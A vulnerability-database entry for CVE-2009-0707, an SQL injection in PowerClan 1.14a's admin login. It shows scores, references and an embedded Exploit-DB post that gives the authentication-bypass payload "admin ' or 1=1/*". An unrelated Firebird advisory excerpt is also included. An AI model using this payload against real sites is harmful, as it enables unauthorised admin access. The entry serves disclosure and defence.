CVE-2009-0707
Published 2009-02-23
CVE-2009-0707: SQL injection vulnerability in admin/index.php in PowerClan 1.14a allows remote attackers to execute arbitrary SQL commands via the loginemail parameter (aka…
Priority P342 · high · 7.5 CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.05% (78.8th percentile)
SQL injection vulnerability in admin/index.php in PowerClan 1.14a allows remote attackers to execute arbitrary SQL commands via the loginemail parameter (aka login field). NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| powerscripts | powerclan | — | — |
No detection rules found.
Exploit-DB
Firebird SQL - op_connect_request main listener shutdown
exploitdb·2009-07-28·CVSS 5.0
CVE-2009-2620 [MEDIUM] Firebird SQL - op_connect_request main listener shutdown
---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Firebird SQL op_connect_request main listener shutdown vulnerability
1. *Advisory Information*
Title: Firebird SQL op_connect_request main listener shutdown vulnerability
Advisory ID: CORE-2009-0707
Advisory URL: http://www.coresecurity.com/content/firebird-sql-dos
Date published: 2009-07-28
Date of last update: 2009-07-28
Vendors contacted: Firebird SQL
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Denial of service (DoS)
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 35842
CVE Name: CVE-2009-2620
3. *Vulnerability Description*
Firebird SQL [1] is
Exploit-DB
PowerClan 1.14a - Authentication Bypass
exploitdb·2009-01-01
CVE-2009-0707 PowerClan 1.14a - Authentication Bypass
---
#######################################################################################
# #
# ...:::::PowerClan 1.14a (Auth Bypass) SQL Injection Vulnerability::::.... #
#######################################################################################
Virangar Security Team
www.virangar.net
Discovered by: virangar security team (hadihadi)
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra
& all virangar members & all hackerz
greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)
exploit:
path to admin area: /admin
login: admin ' or 1=1/*
pass:[whatever]
---
young iranian h4ck3rz
# milw0rm.com [2009-01-01]
No writeups or analysis indexed.
http://osvdb.org/51112
http://secunia.com/advisories/33362
http://www.securityfocus.com/bid/33083
https://exchange.xforce.ibmcloud.com/vulnerabilities/47702
https://www.exploit-db.com/exploits/7642
Published: 2009-02-23